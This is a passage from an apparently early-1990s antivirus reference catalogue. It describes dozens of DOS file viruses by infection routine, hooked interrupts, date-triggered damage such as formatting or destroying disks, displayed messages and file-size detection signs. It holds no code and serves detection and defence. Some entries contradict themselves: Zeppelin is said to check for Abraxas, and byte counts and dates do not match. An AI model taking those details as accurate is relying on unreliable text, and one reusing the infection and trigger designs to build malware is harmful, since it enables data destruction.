  2645. 4) It then executes the original file.
  2646.  
  2647. Damage:  If the system date is the 1st of April, it formats the
  2648. current disk.
  2649.  
  2650. Detection Method: Infected files will increase by 1200 Bytes.
  2651.  
  2652. Note:
  2653. 1) Doesn't stay resident in memory.
  2654. 2) Casper doesn't hook INT 24h when infecting files. Error message
  2655.     appears if there is an I/O error (such as  write protect).
  2656.  
  2657. [Diogenes]
  2658. Virus Name: Diogenes
  2659. Virus Type: File Virus (infects .COM files)
  2660. Virus Length: 946 Bytes(COM)
  2661. PC Vectors Hooked: None
  2662.  
  2663. Execution Procedure:
  2664. 1) Checks whether the system date is the 31st. If "Yes", it damages
  2665.     all files on the  hard disk, then displays this message on the
  2666.     screen: "DIOGENES 2.0 has visited your hard drive...... This
  2667.     has been another fine product of the Lehigh Valley...Watch (out)
  2668.     for future 'upgrades'.. ... The world's deceit has raped my soul.
  2669.     We melt the plastic people down, then we melt their plastic town."
  2670. 2) If "NO', then it searches for a .COM file in the current directory.
  2671. 2) Once it locates a file it checks whether it has been infected by
  2672.     Diogenes.  If "Yes", it continues to look for   any  uninfected
  2673.     .COM file.
  2674. 3) It will only infect one file at a time.
  2675.  
  2676. Damage:  If the system date is the 31st, it damages all files on the
  2677. hard disk.
  2678.  
  2679. Detection Method: Infected files will increase by 946 Bytes.
  2680.  
  2681. Note:
  2682. 1) Doesn't stay resident in memory.
  2683. 2) Diogenes doesn't hook INT 24h when infecting files. Error message
  2684.     appears if there is an I/O error (such as write protect).
  2685.  
  2686. [Brothers-2]
  2687. Virus Name: Brothers-2
  2688. Virus Type: File Virus (infects .COM files)
  2689. Virus Length: 693 Bytes(COM)
  2690. PC Vectors Hooked: None
  2691.  
  2692. Execution Procedure:
  2693. 1) Checks whether the system date is between the 11th and 25th of
  2694.     November or December. If "Yes", it shows the message:
  2695.     "Brotherhood... I am seeking my brothers "DEICIDE" and
  2696.     "MORGOTH"," then executes the original file.
  2697. 2) If "NO', then  it searches for a .COM file in the current
  2698.     directory.
  2699. 2) Once it locates a file it checks whether it has been infected by
  2700.     Brothers-2. If "Yes", it continues to look for any uninfected
  2701.     .COM file.
  2702. 3) It will check whether the second word of the .COM file is "0xADDE";
  2703.     if "yes", it will show the message: "Found my brother MORGOTH!!!."
  2704.     Then executes the original file.
  2705. 4) It will also check whether the second word of the .COM file is
  2706.     "0x0D90"; if "yes", it will show the message: "Found my brother
  2707.     "DEIGOTH" !!!." Then executes the original file.
  2708. 5) If "NO", then it will infect .COM files one at a time.
  2709. 6)It will execute the original file.
  2710.  
  2711. Damage:  None
  2712.  
  2713. Detection Method: Infected files will increase by 693 Bytes.
  2714.  
  2715. Note:
  2716. 1) Doesn't stay resident in memory.
  2717. 2) Brothers-2 doesn't hook INT 24h when infecting files. Error message
  2718.     appears if there is an I/O error (such as write protect).
  2719.  
  2720. [Mindless]
  2721. Virus Name: Mindless
  2722. Virus Type: File Virus (infects .COM files)
  2723. Virus Length: No change
  2724. PC Vectors Hooked: None
  2725.  
  2726. Execution Procedure:
  2727. 1) Checks whether the system date is Sunday. If "yes", it damages
  2728.     all files on the hard disk.
  2729. 2) If  "NO', then it searches for a *.C* file in the current directory.
  2730. 2) Once it locates a file it infects it and continues searching until
  2731.     it infects all the *.C* files in the current directory.
  2732.  
  2733. Damage:
  2734. 1) If the system date is Sunday, it damages all files on the hard disk.
  2735. 2) Overwrites original files, so the length of infected files won't
  2736.     increase.
  2737.  
  2738. Detection Method:  None
  2739.  
  2740. Note:
  2741. 1) Doesn't stay resident in memory.
  2742. 2) Mindless doesn't hook INT 24h when infecting files. Error message
  2743.     appears if there is an I/O error (such as write protect).
  2744.  
  2745. [Acme]
  2746. Virus Name: Acme
  2747. Virus Type: File Virus (Companion Virus)
  2748. Virus Length: 932 Bytes
  2749. PC Vectors Hooked: None
  2750.  
  2751. Execution Procedure:
  2752. 1) Checks whether the system time is after 4 o'clock in the afternoon.
  2753.     If "Yes", a sound is made, then the system halts.
  2754. 2) If "NO', then it searches for an .EXE file in the current directory.
  2755. 3) It will then create a 923 bytes, "hidden & read-only" .COM file
  2756.     with the .EXE file name.
  2757.  
  2758. Damage: If the system time is after 4 o'clock in the afternoon, a sound
  2759. is made, then the system halts.
  2760.  
  2761. Detection Method: Check whether there are "hidden" .COM files with 923
  2762. bytes of data.
  2763.  
  2764. Note:
  2765. 1) Doesn't stay resident in memory.
  2766. 2) ACME doesn't hook INT 24h when infecting files. Error message
  2767.     appears if there is an I/O error (such as write protect).
  2768.  
  2769. [Dest1]
  2770. Virus Name: DEST1
  2771. Virus Type: File Virus (only infects .COM files)
  2772. Virus Length: 323 Bytes
  2773. PC Vectors Hooked: INT 24h
  2774.  
  2775. Execution Procedure:
  2776. 1) Searches for a COM file in the current directory.
  2777. 2) It checks whether it has  been infected by Dest1. If "Yes", it
  2778.     continues to look for an uninfected .COM file.
  2779. 3) It then infects any uninfected .COM file, one file at a time.
  2780. 4) Finally it executes the original file.
  2781.  
  2782. Damage:  None
  2783.  
  2784. Detection method: Infected files will increase by 323 Bytes.
  2785.  
  2786. Note:
  2787. 1) Doesn't stay resident in memory.
  2788. 2) Dest1 hooks INT 24h when infecting files. Omits I/O error
  2789.     (such as write protect).
  2790.  
  2791. [Dest2]
  2792. Virus Name: DEST2
  2793. Virus Type: File Virus (infects .COM files only)
  2794. Virus Length: 478 Bytes
  2795. PC Vectors Hooked: INT 24h
  2796.  
  2797. Execution Procedure:
  2798. 1) Searches for a COM file in the current directory.
  2799. 2) It checks whether it has  been infected by Dest2. If "Yes", it
  2800.     continues to look for an uninfected .COM file.
  2801. 3) It then infects the .COM file. It finally executes the original
  2802.     file.
  2803.  
  2804. Damage:  If kill-flag=-1, it then deletes a file.
  2805.  
  2806. Detection method:  Infected files will increase by 478 Bytes.
  2807.  
  2808. Note:
  2809. 1) Doesn't stay resident in memory.
  2810. 2) Dest2 hook INT 24h when infecting files. Omits I/O error
  2811.     (such as write protect).
  2812.  
  2813. [Cyber101]
  2814. Virus Name: CYBER101
  2815. Virus Type: File Virus (infects .COM and .EXE files)
  2816. Virus Length: 946 Bytes(COM & EXE)
  2817. PC Vectors Hooked: INT 24h
  2818.  
  2819. Execution Procedure:
  2820. 1) The virus searches for a .COM or .EXE file in the current directory.
  2821. 2) It checks whether it has been infected by Cyber101. If "Yes",
  2822.     it continues to look for an uninfected .COM or .EXE file.
  2823. 3) It then infects any .COM or .EXE files in the current directory
  2824.     two at a time.
  2825. 4) Finally it executes the original file.
  2826.  
  2827. Damage:  None
  2828.  
  2829. Detection method:  Infected files will increase by 946 Bytes.
  2830.  
  2831. Note:
  2832. 1) Doesn't stay resident in memory.
  2833. 2) Cyber101 hooks INT 24h when infecting files. Omits I/O error
  2834.     (such as write protect).
  2835.  
  2836. [Cyber]
  2837. Virus Name: CYBER
  2838. Virus Type: File Virus (infects .COM and .EXE files)
  2839. Virus Length: 1092 Bytes(COM & EXE)
  2840. PC Vectors Hooked: INT 24h
  2841.  
  2842. Execution Procedure:
  2843. 1) The virus searches for a .COM or .EXE file in the current directory.
  2844. 2) It checks whether it has been infected by Cyber. If "Yes", it
  2845.     continues to look for an uninfected .COM or .EXE file.
  2846. 3) It then infects any .COM or .EXE file in the current directory two
  2847.     at a time.
  2848. 4) Finally it executes the original file.
  2849.  
  2850. Damage:  None
  2851.  
  2852. Detection method:  Infected files will increase by 1092 Bytes.
  2853.  
  2854. Note:
  2855. 1) Doesn't stay resident in memory.
  2856. 2) Cyber hooks INT 24h when infecting files. Omits I/O error (such
  2857.     as write protect).
  2858.  
  2859. [7thson-2]
  2860. Virus Name: 7THSON-2
  2861. Virus Type: File Virus (infects .COM files)
  2862. Virus Length: 284 or 332 or 350 Bytes(COM)
  2863. PC Vectors Hooked: INT 24h
  2864.  
  2865. Execution Procedure:
  2866. 1) The virus searches for a .COM file in the current directory.
  2867. 2) It checks whether it has been infected by 7thson-2. If "Yes",
  2868.     it continues to look for an uninfected files.
  2869. 3) It then infects all .COM files in the current directory.
  2870. 4) Finally it executes the original file.
  2871.  
  2872. Damage:  None
  2873.  
  2874. Detection method: Infected files will increase by 284, 332, or 350
  2875. Bytes.
  2876.  
  2877. Note:
  2878. 1) Doesn't stay resident in memory.
  2879. 2) 7thson-2 hooks INT 24h when infecting files. Omits I/O error
  2880. (such as write protect).
  2881.  
  2882. [Bamestra]
  2883. Virus Name: BAMESTRA
  2884. Virus Type: File Virus (infects .EXE files)
  2885. Virus Length: 530 Bytes(EXE)
  2886. PC Vectors Hooked: INT 24h
  2887.  
  2888. Execution Procedure:
  2889. 1) The virus searches for an .EXE file in the current directory.
  2890. 2) It checks whether it has been infected by Bamestra. If "Yes",
  2891.     it continues to look for an uninfected .EXE file.
  2892. 3) It then infects any .EXE  file in the current directory two at a
  2893.     time.
  2894. 4) Finally it executes the original file.
  2895.  
  2896. Damage:  None
  2897.  
  2898. Detection method: Infected files will increase by 530 Bytes.
  2899.  
  2900. Note:
  2901. 1) Doesn't stay resident in memory.
  2902. 2) Bamestra hooks INT 24h when infecting files. Omits I/O error
  2903.     (such as write protect).
  2904.  
  2905. [Abraxas]
  2906. Virus Name: ABRAXAS
  2907. Virus Type: File Virus (infects .COM and .EXE files)
  2908. Virus Length: 546 Bytes(COM & EXE)
  2909. PC Vectors Hooked: INT 24h
  2910.  
  2911. Execution Procedure:
  2912. 1) The virus searches for an .EXE or .COM file in the current
  2913.     directory.
  2914. 2) It checks whether it has been infected by Abraxas.  If "Yes",
  2915.     it continues to look for an uninfected .EXE or .COM file.
  2916. 3) It then infects all .EXE and .COM files in the current directory.
  2917. 4) Finally it executes the original file.
  2918.  
  2919. Damage:  None
  2920.  
  2921. Detection method:  Infected files will increase by 546 Bytes.
  2922.  
  2923. Note:
  2924. 1) Doesn't stay resident in memory.
  2925. 2) Abraxas hooks INT 24h when infecting files. Omits I/O error
  2926.     (such as write protect).
  2927.  
  2928. [MPC-1]
  2929. Virus Name: MPC-1
  2930. Virus Type: File Virus (infects .COM and .EXE files)
  2931. Virus Length: 641 Bytes (COM & EXE)
  2932. PC Vectors Hooked: INT 24h
  2933.  
  2934. Execution Procedure:
  2935. 1) The virus searches for an .EXE or .COM file in the current
  2936.     directory.
  2937. 2) It checks whether it has been infected by MPC-1.  If "Yes",
  2938.     it continues to look for an uninfected .EXE or .COM file.
  2939. 3) It then infects all .EXE and .COM files in the current directory.
  2940. 4) Finally it executes the original file.
  2941.  
  2942. Damage:  None
  2943.  
  2944. Detection method: Infected files will increase by 641 Bytes.
  2945.  
  2946. Note:
  2947. 1) Doesn't stay resident in memory.
  2948. 2) MPC-1 hooks INT 24h when infecting files. Omits I/O error
  2949.     (such as write protect).
  2950.  
  2951. [Zeppelin]
  2952. Virus Name: ZEPPELIN
  2953. Virus Type: File Virus (infects .COM and .EXE files)
  2954. Virus Length: 1508 Bytes (COM and EXE)
  2955. PC Vectors Hooked: INT 24h
  2956.  
  2957. Execution Procedure:
  2958. 1) The virus searches for an .EXE or .COM file in the current
  2959.     directory.
  2960. 2) It checks whether it has been infected by Abraxas. If "Yes",
  2961.     it continues to look for an uninfected .EXE or .COM file.
  2962. 3) It then infects any .EXE and .COM files in the current directory
  2963.     four at a time.
  2964. 4) Finally it displays various codes, and sounds are made at the
  2965.     same time, then the system halts.
  2966.  
  2967. Damage: Shows codes, and makes strange sounds at the same time, then
  2968. the system halts.
  2969.  
  2970. Detection method:
  2971. 1) Infected files will increase by 1508 Bytes.
  2972. 2) Codes appear on the screen.
  2973.  
  2974. Note:
  2975. 1) Doesn't stay resident in memory.
  2976. 2) Zeppelin hooks INT 24h when infecting files. Omits I/O error
  2977.     (such as write protect).
  2978.  
  2979. [Crumble]
  2980. Virus Name: CRUMBLE
  2981. Virus Type: File Virus (infects .COM and .EXE files)
  2982. Virus Length: 778 Bytes (COM & EXE)
  2983. PC Vectors Hooked: INT 24h
  2984.  
  2985. Execution Procedure:
  2986. 1) The virus searches for an .EXE or .COM file in the current
  2987.     directory.
  2988. 2) It checks whether it has been infected by Crumble. If "Yes",
  2989.     it continues to look for an uninfected .EXE or .COM file.
  2990. 3) It then infects any .EXE or .COM files in the current directory
  2991.     two files at a time.
  2992. 4) Finally it checks the system date; if it is Friday, the message
  2993.     "falling letter" appears on the screen, then a letter falls
  2994.     every 5 seconds on the screen.
  2995.  
  2996. Damage:  If it is Friday, system will display "falling letter."
  2997.  
  2998. Detection method:  Infected files will increase by 778 Bytes.
  2999.  
  3000. Note:
  3001. 1) Doesn't stay resident in memory.
  3002. 2) Crumble hooks INT 24h when infecting files. Omits I/O error
  3003.     (such as write protect).
  3004.  
  3005. [COL-MAC]
  3006. Virus Name: COL_MAC
  3007. Virus Type: File Virus (infects .COM and .EXE files)
  3008. Virus Length: 1022 Bytes (COM and EXE)
  3009. PC Vectors Hooked: INT 24h
  3010.  
  3011. Execution Procedure:
  3012. 1) The virus searches for an .EXE or .COM file in the current
  3013.     directory.
  3014. 2) It checks whether it has been infected by COL_MAC. If "Yes",
  3015.     it continues to look for an uninfected .EXE or .COM file.
  3016. 3) It then infects any two .EXE and .COM files in the current
  3017.     directory.
  3018. 4) Finally it shows a lot of random letters on the screen until the
  3019.     ENTER key is pressed.
  3020.  
  3021. Damage:  None
  3022.  
  3023. Detection method:  Infected files will increase by 1022 Bytes.
  3024.  
  3025. Note:
  3026. 1) Doesn't stay resident in memory.
  3027. 2) COL_MAC hooks INT 24h when infecting files. Omits I/O error
  3028.     (such as write protect).
  3029.  
  3030. [Galileo]
  3031. Virus Name: GALILEO
  3032. Virus Type: File Virus (infects .COM and .EXE files)
  3033. Virus Length: 760 Bytes (COM and EXE)
  3034. PC Vectors Hooked: INT 24h
  3035.  
  3036. Execution Procedure:
  3037. 1) Checks whether system date is Monday; if "Yes", the virus will
  3038.     damage all files on the hard disk.
  3039. 2) It searches for a .COM or .EXE file in current directory.
  3040. 3) It then infects all .COM and .EXE files in the current directory.
  3041.  
  3042. Damage: If it is Monday, the virus will damage all files on the
  3043. hard disk.
  3044.  
  3045. Detection method:  Infected files will increase by 760 Bytes.
  3046.  
  3047. Note:
  3048. 1) Doesn't stay resident in memory.
  3049. 2) Galileo hooks INT 24h when infecting files. Omits I/O error
  3050.     (such as write protect).
  3051.  
  3052. [Wharps]
  3053. Virus Name: WHARPS
  3054. Virus Type: File Virus (infects .COM files)
  3055. Virus Length: 572 Bytes (COM)
  3056. PC Vectors Hooked: INT 24h
  3057.  
  3058. Execution Procedure:
  3059. 1) The virus checks whether the system time is 3 o'clock in the
  3060.     morning; if "Yes", the message appears on the screen:
  3061.     "wHaRpS! It is 3:00 a.m. > ETERNAL."
  3062. 2) It searches for a .COM file in the current directory.
  3063. 3) It then checks whether it has been infected by Wharps.  If
  3064.     "Yes", it continues to look for an uninfected .COM file,
  3065.     infecting each file one at a time.
  3066. 5) Finally it executes the original file.
  3067.  
  3068. Damage:  Infected files can't be executed.
  3069.  
  3070. Detection method:  Infected files will increase by 572 Bytes.
  3071.  
  3072. Note:
  3073. 1) Doesn't stay resident in memory.
  3074. 2) Wharps hooks INT 24h when infecting files. Omits I/O error
  3075.     (such as write protect).
  3076.  
  3077. [Bubbles-2]
  3078. Virus Name: BUBBLES-2
  3079. Virus Type: File Virus (infects .COM and .EXE files)
  3080. Virus Length: 927 Bytes (COM and EXE)
  3081. PC Vectors Hooked: INT 24h
  3082.  
  3083. Execution Procedure:
  3084. 1) The virus searches for an .EXE or .COM file in the current
  3085.     directory.
  3086. 2) It checks whether it has been infected by Bubbles-2. If "Yes",
  3087.     it continues to look for an uninfected .EXE or .COM file.
  3088. 3) It then infects all .EXE and .COM files in the current directory.
  3089. 4) It finally checks whether the system date is the 13th and year is
  3090.     not smaller than 1993, then it displays this message on the
  3091.     screen: "Bubbles 2 : "Its back and better then ever.  Is
  3092.     it me or does that make no sense at all?"
  3093.  
  3094. Damage:  Infected files can't be executed.
  3095.  
  3096. Detection method: Infected files will increase by 927 Bytes.
  3097.  
  3098. Note:
  3099. 1) Doesn't stay resident in memory.
  3100. 2) Bubbles-2 hooks INT 24h when infecting files. Omits I/O error
  3101.     (such as write protect).
  3102.  
  3103. [Cybertech]
  3104. Virus Name: CYBERTECH
  3105. Virus Type: File Virus (infects .COM files)
  3106. Virus Length: 1076 Bytes (COM)
  3107. PC Vectors Hooked: INT 24h
  3108.  
  3109. Execution Procedure:
  3110. 1) It checks whether the system date is smaller than 1993. If "Yes",
  3111.     then the virus searches for a .COM file in the current directory.
  3112. 2) It checks whether it has been infected by Cybertech.  If "Yes",
  3113.     it continues to look for an uninfected .COM file.
  3114. 3) It then infects any .COM file in the current directory one at a
  3115.     time.
  3116. 4) If "no", then this message appears on the screen: "The previous
  3117.     year you have been infected by a virus without knowing or removing
  3118.     it. To be gentle to you I decided to remove myself from your
  3119.     system. I suggest you better buy VirusScan of McAfee to ensure
  3120.     yourself complete security of your precious data. Next time you
  3121.     could be infected with a malevolent virus. May I say goodbye to you
  3122.     for now. CyberTech Virus-Strain A  (c) 1992 John Tardy of Trident".
  3123.     It finally restores the current file as before.
  3124.  
  3125. Damage:  None
  3126.  
  3127. Detection method: Infected files will increase by 1076 Bytes.
  3128.  
  3129. Note:
  3130. 1) Doesn't stay resident in memory.
  3131. 2) Cybertech hooks INT 24h when infecting files. Omits I/O error
  3132.     (such as write protect).
  3133.  
  3134. [Crazy]
  3135. Virus Name: CRAZY
  3136. Virus Type: Boot Strap Sector Virus
  3137. Virus Length:  4006 Bytes
  3138. PC Vectors Hooked: None
  3139.  
  3140. Execution Procedure: This virus infects no file, partition or boot
  3141. sector.  When it is executed, it will create 50 subdirectories,
  3142. 50 subdirectories are created in each subdirectory.
  3143.  
  3144. Damage:  None
  3145.  
  3146. Detection method:  None
  3147.  
  3148. Note:
  3149. 1) Doesn't stay resident in memory.
  3150. 2) Crazy doesn't hook INT 24h when infecting files. An error message
  3151.     appears if there is an I/O error (such as write protect).
  3152.  
  3153. [Burger_560-8]
  3154. Virus Name: BURGER_560-8
  3155. Virus Type: File Virus (infects .COM files)
  3156. Virus Length: No change
  3157. PC Vectors Hooked: None
  3158.  
  3159. Execution Procedure:
  3160. 1) Searches for a .COM file in A:.
  3161. 2) It checks whether it has been infected by Burger_560-8. If "Yes",
  3162.     it continues to look for an uninfected  .COM file.
  3163. 3) It then infects an uninfected file one at a time.
  3164. 4) If no .COM file is infected, it will continue to look for an .EXE
  3165.     file in A:.
  3166. 5) It finally renames the .EXE file to .COM, then it infects the
  3167.     .COM file.
  3168.  
  3169. Damage: Overwrites the original file, so the length of the infected
  3170. file won't increase.
  3171.  
  3172. Detection method: Changes .EXE file to a .COM file.
  3173.  
  3174. Note:
  3175. 1) Doesn't stay resident in memory.
  3176. 2) Burger_560-8 don't hooks INT 24h when infecting files. Error
  3177.     message appears if there is an I/O error (such as write protect).
  3178.  
  3179. [Boys]
  3180. Virus Name: BOYS
  3181. Virus Type: File Virus (infects .COM files)
  3182. Virus Length: 500 Bytes(COM)
  3183. PC Vectors Hooked: None
  3184.  
  3185. Execution Procedure:
  3186. 1) It searches for an .EXE file, it then changes the attribute to
  3187.     "SYSTEM".
  3188. 2) It searches for a .COM file in the current directory.
  3189. 3) It then checks whether it has been infected by Boys. If "Yes",
  3190.     it continues to look for an uninfected .COM file.
  3191. 4) It only infects one file at a time, and changes the attribute to
  3192.     "READ-ONLY".
  3193. 5) Finally it executes the original file.
  3194.  
  3195. Damage:  None.
  3196.  
  3197. Detection method: Infected files will increase by 500 Bytes.
  3198.  
  3199. Note:
  3200. 1) Doesn't stay resident in memory.
  3201. 2) Boys doesn't hook INT 24h when infecting files. An error message
  3202.     appears if there is an I/O error (such as write protect).
  3203.  
  3204. [Null]
  3205. Virus Name: NULL
  3206. Virus Type: File Virus (infects .COM files)
  3207. Virus Length: 733 Bytes (COM)
  3208. PC Vectors Hooked: None
  3209.  
  3210. Execution Procedure:
  3211. 1) It first decodes.
  3212. 2) Then it searches for a .COM file in the current directory.
  3213. 3) It checks whether it has  been infected by Null. If "Yes", it
  3214.     continues to look for an uninfected .COM file.
  3215. 4) It infects only one file at a time.
  3216. 5) It then executes  the original file.
  3217. 6) If it can not infect a .COM file, then it checks whether the
  3218.     DAY =30. If "yes", it destroys all the data on the disk, then
  3219.     shows the message: "Your disk is dead! Long life Doomsday 1.0."
  3220.  
  3221. Damage: If DAY = 30 , then it destroys all data on the current disk.
  3222.  
  3223. Detection method: Infected files will increase by 733 Bytes.
  3224.  
  3225. Note:
  3226. 1) Doesn't stay resident in memory.
  3227. 2) Null doesn't hook INT 24h when infecting files. An error message
  3228.     appears if there is an I/O error (such as write protect).
  3229.  
  3230. [Vienna-11]
  3231. Virus Name: VIENNA-11
  3232. Virus Type: File Virus (infects .COM files)
  3233. Virus Length: 943 Bytes (COM)
  3234. PC Vectors Hooked: None
  3235.  
  3236. Execution Procedure:
  3237. 1) Checks whether the clock's Seconds field is equal to .0004. If
  3238.     "Yes", then this message will appear on the screen: "Sorry
  3239.     this computer is no longer operational due to an outbreak of
  3240.     Bush is hero,  Have a Nice day. . . "
  3241. 2) Next it will check as to whether the time is equal to 7:45 and
  3242.     24th of March. If "Yes", then a message will appear on the
  3243.     screen: "VIPERizer, Strain B (c) 1992, Stin gray/VIPER
  3244.     Happy Valentines Day !"  It then destroys all data on all of the
  3245.     disks including the hard disk.
  3246. 3) If "No", then it searches for a .COM file in the current directory.
  3247. 4) Checks whether it has been infected by Vienna-11. If "Yes", it
  3248.     continues to look for an uninfected .COM file.
  3249. 5) It only infects one file at a time, afterwards it executes the
  3250.     original file.
  3251.  
  3252. Damage: Destroys all data on all of the disks.
  3253.  
  3254. Detection method: Infected files will increase by 943 Bytes.
  3255.  
  3256. Note:
  3257. 1) Doesn't stay resident in memory.
  3258. 2) Vienna-11 doesn't hook INT 24h when infecting files. An error
  3259.     message appears if there is an I/O error (such as write protect).
  3260.  
  3261. [Intrud-B]
  3262. Virus Name: INTRUD-B
  3263. Virus Type: File Virus (infects .EXE files)
  3264. Virus Length: 1225 Bytes (EXE)
  3265. PC Vectors Hooked: None
  3266.  
  3267. Execution Procedure:
  3268. 1) Searches for an .EXE file in the current directory.
  3269. 2) It checks whether it has  been infected by Intrud-B. If "Yes",
  3270.     it continues to look for an uninfected .EXE file.
  3271. 3) It then infects only one file at a time.
  3272. 4) It then executes the original file.
  3273.  
  3274. Damage:  None
  3275.  
  3276. Detection method: Infected files will increase by 1225 Bytes.
  3277.  
  3278. Note:
  3279. 1) Doesn't stay resident in memory.
  3280. 2) Intrud-B doesn't hook INT 24h when infecting files. An error
  3281.     message appears if there is an I/O error (such as write
  3282.     protect).
  3283.  
  3284. [New-s]
  3285. Virus Name: NEW-S
  3286. Virus Type: File Virus (infects .EXE files)
  3287. Virus Length: 1214 Bytes
  3288. PC Vectors Hooked: None
  3289.  
  3290. Execution Procedure:
  3291. 1) First shows a strange figure on the screen (with music).
  3292. 2) Then searches for an EXE file in the current directory.  It then
  3293.     creates a file of the same name with the length of 1214 bytes
  3294.     and overwrites the  original file.  The new file is New-S.
  3295. 3) Finally it overwrites the COMMAND.COM in the root directory and
  3296.     copies the overwritten file to the root directory.
  3297.  
  3298. Damage:  Overwrites original file.
  3299.  
  3300. Detection method: Infected files will increase by 1214 Bytes.
  3301.  
  3302. Note:
  3303. 1) Doesn't stay resident in memory.
  3304. 2) NEW-S doesn't hook INT 24h when infecting files. An error message
  3305.     appears if there is an I/O error (such as write protect).
  3306.  
  3307. [X-1-B]
  3308. Virus Name: X-1-B
  3309. Virus Type: File Virus (infects .EXE files)
  3310. Virus Length: 555 Bytes (EXE)
  3311. PC Vectors Hooked: None
  3312.  
  3313. Execution Procedure:
  3314. 1) The virus checks whether the system date is the 5th of March.
  3315.     If "Yes", it displays the message: "ICE-9 Present In Association
  3316.     with.. The ARcV [X-1] Michelangelo activates. . -<TOMORROW>-,"
  3317.     then the system halts.
  3318. 2) If "No", then it searches for an .EXE file in the current directory.
  3319. 3) It checks whether it has been infected already by X-1. If "Yes", it
  3320.     continues to look for an uninfected .EXE file.
  3321. 4) It then infects only one file at a time.
  3322. 5) Then it executes the original file.
  3323.  
  3324. Damage: If it is the 5th of  March, it displays a message, and then the
  3325. system halts.
  3326.  
  3327. Detection method: Infected files will increase by 555 Bytes.
  3328.  
  3329. Note:
  3330. 1) Doesn't stay resident in memory.
  3331. 2) X-1 doesn't hook INT 24h when infecting files. An error message
  3332.     appears if there is an I/O error (such as  write protect).
  3333.  
  3334. [Lep-FVHS]
  3335. Virus Name: LEP-FVHS
  3336. Virus Type: File Virus (infects .COM and .EXE files)
  3337. Virus Length: NO change
  3338. PC Vectors Hooked: None
  3339.  
  3340. Execution Procedure:
  3341. 1) Shows the message: "allocating memory..... Please wait.....
  3342.     Hard time accessing memory, please turn off all RAM resident
  3343.     programs and press>>Enter<< to continue...."
  3344. 2) The virus searches for an .EXE or .COM file in the current
  3345.     directory.
  3346. 3) It checks whether it has been infected by LEP-FVHS.  If "Yes",
  3347.     it continues to look for an uninfected .EXE or .COM file.
  3348. 4) If "No", it then infects any four .EXE and .COM files at a time
  3349.     in the current directory.
  3350. 5) Shows the message: "Program too big to fit in memory."
  3351.  
  3352. Damage: Overwrites original files, so the length of infected files
  3353. won't increase.
  3354.  
  3355. Detection method: Shows the message: "Allocating memory...."
  3356.  
  3357. Note:
  3358. 1) Doesn't stay resident in memory.
  3359. 2) LEP-FVHS doesn't  hook INT 24h when infecting files. An error
  3360.     message appears if there is an I/O error (such as write protect).
  3361.  
  3362. [Monxla]
  3363. Virus Name: MONXLA
  3364. Virus Type: File Virus (infects .COM files)
  3365. Virus Length: 939 Bytes (COM)
  3366. PC Vectors Hooked: None
  3367.  
  3368. Execution Procedure:
  3369. 1) The virus searches for a .COM file in the current directory.
  3370. 2) It checks whether the system date is the 13th; if "Yes", then it
  3371.     destroys the file.
  3372. 3) If "No", it checks whether it has been infected by MONXLA.
  3373.     If "Yes", it continues to look for an uninfected .COM file.
  3374. 3) It then infects any one .COM file in the current directory.
  3375. 4) Finally it executes the original file.
  3376.  
  3377. Damage: If the system date is the 13th, then it destroys a .COM file.
  3378.  
  3379. Detection method: Infected files will increase by 939 Bytes.
  3380.  
  3381. Note:
  3382. 1) Doesn't stay resident in memory.
  3383. 2) MONXLA doesn't hook INT 24h when infecting files.  An error message
  3384.     appears if there is an I/O error (such as write protect).
  3385.  
  3386. [More-649]
  3387. Virus Name: MORE-649
  3388. Virus Type: Memory Resident, File Virus (infects .COM files)
  3389. Virus Length:  649 Bytes (COM)
  3390. PC Vectors Hooked: INT 21h (AX=4B00h), execute program
  3391.  
  3392. Infection Procedure:
  3393. 1) The virus checks whether it is already loaded resident in memory.
  3394.     If "No", it then loads itself resident into memory by hooking
  3395.     INT 21h.
  3396. 2) It then executes the original file.
  3397. 3) With itself loaded resident in memory it will infect any
  3398.     uninfected file that is executed. (b) It doesn't infect .EXE
  3399.     files or files with special dates (year larger than 1999).
  3400. 4) When the virus detects a file that has a date larger than 1999,
  3401.     this message appears: "OH NO NOT MORE ARCV".
  3402.  
  3403. Damage:  None
  3404.  
  3405. Detection method: Infected .COM files increase by 649 Bytes.
  3406.  
  3407. [Arka]
  3408. Virus Name: ARKA
  3409. Virus Type: Memory Resident, File Virus (infects .COM files).
  3410. Virus Length:  1905 Bytes (COM)
  3411. PC Vectors Hooked: INT 21h (AX=4B00h), execute program
  3412.  
  3413. Infection Procedure:
  3414. 1) The virus checks whether it is already loaded resident in memory.
  3415.     If "No", it then loads itself resident into memory by hooking INT
  3416.     21h.
  3417. 2) It then executes the original file.
  3418. 3) With itself loaded resident in memory it will infect any executed
  3419.     file that is not already infected with the ARKA virus.
  3420.  
  3421. Damage:  None
  3422.  
  3423. Detection method: Infected COM files increase by 1905 Bytes.
  3424.  
  3425. [578]
  3426. Virus Name: 578
  3427. Virus Type:  Memory Resident, File Virus (infects .COM files)
  3428. Virus Length:  578 Bytes (COM)
  3429. PC Vectors Hooked: INT 21h (AX=4B00h), execute program
  3430.  
  3431. Infection Procedure:
  3432. 1) The virus checks whether it is already loaded resident in memory.
  3433.     If "No", it then loads itself resident into memory by hooking INT
  3434.     21h.
  3435. 2) It then executes the original file.
  3436. 3) With itself loaded resident in memory it will infect any uninfected
  3437.     file that is executed. (b) It doesn't infect .EXE files.
  3438. 4) The virus will then check the system date; if it is later than
  3439.     April 3, then the virus will destroy all data on A: followed by
  3440.     the displaying of three colored flags and the message: "ITALY
  3441.     IS THE BEST COUNTRY IN THE WORLD."
  3442.  
  3443. Damage: If the system date is later than April 3, the virus will
  3444. destroy all data on A:.
  3445.  
  3446. Detection method: Infected COM files increase by 578 Bytes.
  3447.  
  3448. Note:
  3449. 1) 578 doesn't hook INT 24h when infecting files. An error message
  3450.     appears if there is an I/O error (such as write protect).
  3451.  
  3452. [5LO]
  3453. Virus Name: 5LO
  3454. Virus Type:  Memory Resident, File Virus (infects .EXE files).
  3455. Virus Length:  1125-1140 Bytes (EXE)
  3456. PC Vectors Hooked: INT 21h (AX=4B00h) (execute program)
  3457.  
  3458. Infection Procedure:
  3459. 1) The virus checks whether it is already loaded resident in memory.
  3460.     If "No", it then loads itself resident into memory by hooking INT
  3461.     21h
  3462. 2) It then executes the original file.
  3463. 3) With itself loaded resident into memory it will infect any
  3464.     uninfected file that is executed. (b) It doesn't infect .COM files.
  3465.  
  3466. Damage:  None
  3467.  
  3468. Detection method: Infected .EXE files increase by 1125-1140 Bytes.
  3469.  
  3470. Note: The 5LO virus doesn't hook INT 24h when infecting files. An error
  3471. message appears if there is an I/O error (such as write protect).
  3472.  
  3473. [Aids 552]
  3474. Virus Name: AIDS552
  3475. Virus Type: Highest Memory Resident, File Virus (infects .EXE files)
